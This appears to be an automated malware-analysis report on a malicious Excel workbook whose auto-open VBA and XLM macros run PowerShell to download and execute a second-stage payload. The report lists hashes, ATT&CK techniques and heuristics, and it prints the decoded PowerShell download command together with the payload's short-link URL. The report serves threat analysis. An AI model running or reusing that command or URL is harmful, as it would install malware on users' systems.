Office (OLE) / .XLS malware analysis — malicious · b9792c45b3e35dc3

MALICIOUS

Office (OLE) / .XLS

182.5 KB Created: 2020-11-20 17:59:00 Authoring application: Microsoft Excel

MD5: af012d30f2f307ba8c4f5846694c050c SHA-1: 59a36492f4b03fad0fde4c50b2601828a3aa0b36 SHA-256: b9792c45b3e35dc39375ff803d8dc037cfe0ff7a654fe83bf946309d8270eeef

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell T1204.002 Malicious File T1566.002 Spearphishing Attachment

The critical ClamAV detection and high-priority OLE_VBA_AUTO heuristic indicate malicious intent. The VBA macro's auto_open subroutine constructs and executes a PowerShell command. This command reconstructs the string 'powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata};.('.'+'/ii.exe')' which downloads a file from 'https://cutt.ly/uhRomRh' and saves it as 'ii.exe' in the user's AppData directory. The XLM macro also contains similar logic, further confirming the download and execution of a second-stage payload.

Heuristics 4

ClamAV: Xls.Malware.Abracadabra-10031695-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Abracadabra-10031695-0
Auto_Open macro high OLE_VBA_AUTO

Auto_Open macro
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`xlm_macros.txt` `4d41263203e1a0ee70d2fa96184b775a93bd7c0f4997c3fcf06010d15e709fa6`	xlm-macro	oletools.olevba.extract_all_macros (XLM macro listing)	1784 bytes
`macros.bas` `cd570610748f1d9f3b3da8aecc12295e1dff4beebd51624b3e1fafca26bf9c59`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1016 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.